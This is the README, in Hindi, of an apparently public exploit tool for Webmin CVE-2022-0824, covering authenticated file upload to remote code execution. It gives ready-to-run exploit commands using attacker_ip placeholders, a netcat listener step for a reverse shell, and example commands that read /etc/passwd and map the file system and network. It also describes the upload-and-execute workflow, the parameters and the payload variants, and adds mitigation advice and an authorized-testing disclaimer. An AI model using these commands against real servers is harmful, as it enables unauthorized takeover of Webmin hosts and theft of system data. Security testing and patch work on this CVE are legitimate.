Webmin-CVE-2022-0824-Enhanced-Exploit
[!IMPORTANT]
Webmin CVE-2022-0824 उन्नत शोषण उपकरण - कमांड निष्पादन और रिवर्स शेल दोहरे मोड का समर्थन करता है

[!IMPORTANT]
Webmin CVE-2022-0824 भेद्यता के लिए एक उन्नत शोषण उपकरण, जो सीधे कमांड निष्पादन और रिवर्स शेल दो मोड का समर्थन करता है।
🚀 विशेषताएँ
- ✅ दोहरे मोड समर्थन: कमांड निष्पादन मोड + रिवर्स शेल मोड
- ✅ एकाधिक पेलोड: Perl, Bash, Python तीन अलग-अलग पेलोड
- ✅ बुद्धिमान फ़ाइल प्रबंधन: स्वचालित रूप से अद्वितीय फ़ाइल नाम उत्पन्न करता है, फ़ाइल विरोध से बचाता है
- ✅ अनिवार्य ओवरराइट अपलोड: मौजूदा फ़ाइलों के ओवरराइट को स्वचालित रूप से संभालता है
- ✅ एकाधिक अपलोड विधियाँ: HTTP डाउनलोड, सीधे अपलोड, कमांड निष्पादन द्वारा निर्माण
- ✅ विस्तृत डीबग जानकारी: पूर्ण निष्पादन प्रक्रिया लॉग
- ✅ उपयोगकर्ता-अनुकूल इंटरफ़ेस: रंगीन आउटपुट और स्पष्ट स्थिति संकेत
📋 भेद्यता जानकारी
- CVE संख्या: CVE-2022-0824
- प्रभावित संस्करण: Webmin < 1.990
- भेद्यता प्रकार: मनमानी फ़ाइल अपलोड के कारण दूरस्थ कोड निष्पादन
- CVSS स्कोर: 9.8 (गंभीर)
🛠️ स्थापना आवश्यकताएँ
# Python 3.6+
pip3 install requests urllib3
📖 उपयोग विधि
कमांड निष्पादन मोड (अनुशंसित)
# बुनियादी कमांड निष्पादन
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"
# सिस्टम जानकारी देखें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"
# फ़ाइलें सूचीबद्ध करें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"
# संवेदनशील फ़ाइलें देखें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"
# नेटवर्क जानकारी
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"
रिवर्स शेल मोड
# 1. लिसनर प्रारंभ करें
nc -nlvp 9999
# 2. शोषण निष्पादित करें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999
📝 पैरामीटर स्पष्टीकरण
| पैरामीटर | विवरण | आवश्यक | उदाहरण |
|---|
-t, --target | लक्ष्य Webmin URL | ✅ | http://192.168.1.100:10000/ |
-c, --credential | लॉगिन क्रेडेंशियल | ✅ | admin:password |
-LS, --py3http_server | HTTP सर्वर पता | ✅ | 192.168.1.50:8080 |
--shell | निष्पादित करने के लिए कमांड | ❌ | "ls -la" |
-L, --callback_ip | रिवर्स शेल कॉलबैक IP | ❌* | 192.168.1.50 |
-P, --callback_port | रिवर्स शेल कॉलबैक पोर्ट | ❌* | 9999 |
*नोट: रिवर्स शेल मोड में आवश्यक
🎯 उपयोग उदाहरण
उदाहरण 1: सिस्टम जानकारी संग्रह
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"
उदाहरण 2: फ़ाइल सिस्टम अन्वेषण
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"
उदाहरण 3: नेटवर्क कॉन्फ़िगरेशन देखना
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"
🔧 कार्य सिद्धांत
- लॉगिन प्रमाणीकरण: प्रदान किए गए क्रेडेंशियल का उपयोग करके Webmin प्रबंधन इंटरफ़ेस में लॉगिन करें
- पेलोड निर्माण: मोड के अनुसार संबंधित CGI स्क्रिप्ट उत्पन्न करें
- फ़ाइल अपलोड: फ़ाइल प्रबंधक के HTTP डाउनलोड फ़ंक्शन के माध्यम से पेलोड अपलोड करें
- अनुमति सेटिंग: अपलोड की गई फ़ाइलों के लिए निष्पादन अनुमतियाँ सेट करें
- कमांड निष्पादन: अपलोड की गई CGI स्क्रिप्ट तक पहुँचें और कमांड निष्पादित करें या रिवर्स कनेक्शन स्थापित करें
🛡️ सुरक्षा सुझाव
- Webmin को नवीनतम संस्करण (>= 1.990) में अपडेट करें
- Webmin प्रबंधन इंटरफ़ेस तक नेटवर्क पहुँच प्रतिबंधित करें
- मजबूत पासवर्ड और दो-कारक प्रमाणीकरण का उपयोग करें
- सिस्टम लॉग का नियमित ऑडिट करें
- वेब एप्लिकेशन फ़ायरवॉल (WAF) तैनात करें
⚠️ अस्वीकरण
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।
- 🚫 अनधिकृत सिस्टम पर उपयोग निषिद्ध
- 🚫 दुर्भावनापूर्ण हमलों के लिए उपयोग निषिद्ध
- 🚫 उपयोगकर्ता संबंधित कानूनी जिम्मेदारी वहन करेगा
- ✅ केवल स्पष्ट रूप से अधिकृत वातावरण में उपयोग करें
- ✅ सुरक्षा अनुसंधान और भेद्यता सत्यापन के लिए उपयोग करें
📚 तकनीकी विवरण
पेलोड प्रकार
- Perl CGI: मुख्य पेलोड, सबसे अच्छी संगतता
- Bash CGI: बैकअप पेलोड, Linux सिस्टम के लिए उपयुक्त
- Python CGI: बैकअप पेलोड, सबसे समृद्ध कार्यक्षमता
अपलोड विधियाँ
- HTTP डाउनलोड: Webmin फ़ाइल प्रबंधक की दूरस्थ डाउनलोड सुविधा के माध्यम से
- सीधे अपलोड: फ़ाइल अपलोड इंटरफ़ेस के माध्यम से
- कमांड निर्माण: सिस्टम कमांड के माध्यम से फ़ाइल बनाना
फ़ाइल नामकरण रणनीति
- कमांड सामग्री के MD5 हैश पर आधारित
- टाइमस्टैम्प प्रत्यय
- सुनिश्चित करें कि प्रत्येक निष्पादन में अलग-अलग फ़ाइल नाम का उपयोग किया जाए
🔄 अद्यतन लॉग
v5.0 (2025-08-05)
- ✨ कमांड निष्पादन मोड जोड़ा गया
- 🐛 फ़ाइल ओवरराइट समस्या ठीक की गई
- 🔧 फ़ाइल नामकरण रणनीति में सुधार किया गया
- 📈 त्रुटि हैंडलिंग बढ़ाई गई
v4.0 (मूल पर आधारित)
- 🎯 faisalfs10x के मूल कोड पर आधारित
- 🔧 CGI संगतता में सुधार किया गया
- 📝 विस्तृत लॉग जोड़े गए
🤝 योगदान
Issue और Pull Request सबमिट करने का स्वागत है!
- इस प्रोजेक्ट को Fork करें
- एक फीचर ब्रांच बनाएं (
git checkout -b feature/AmazingFeature)
- परिवर्तन कमिट करें (
git commit -m 'Add some AmazingFeature')
- ब्रांच पर पुश करें (
git push origin feature/AmazingFeature)
- Pull Request खोलें
📄 लाइसेंस
यह प्रोजेक्ट MIT लाइसेंस के तहत है - विवरण के लिए LICENSE फ़ाइल देखें
🙏 आभार
📞 संपर्क
यदि कोई प्रश्न या सुझाव हो, तो कृपया निम्नलिखित माध्यमों से संपर्क करें:
- 📧 GitHub Issue सबमिट करें
- 🐛 सुरक्षा मुद्दों की रिपोर्ट करने के लिए कृपया निजी संदेश भेजें
⭐ यदि यह प्रोजेक्ट आपके लिए उपयोगी है, तो कृपया एक Star देकर समर्थन करें!
🔗 संबंधित लिंक
requirements.txt
requests>=2.25.1
urllib3>=1.26.0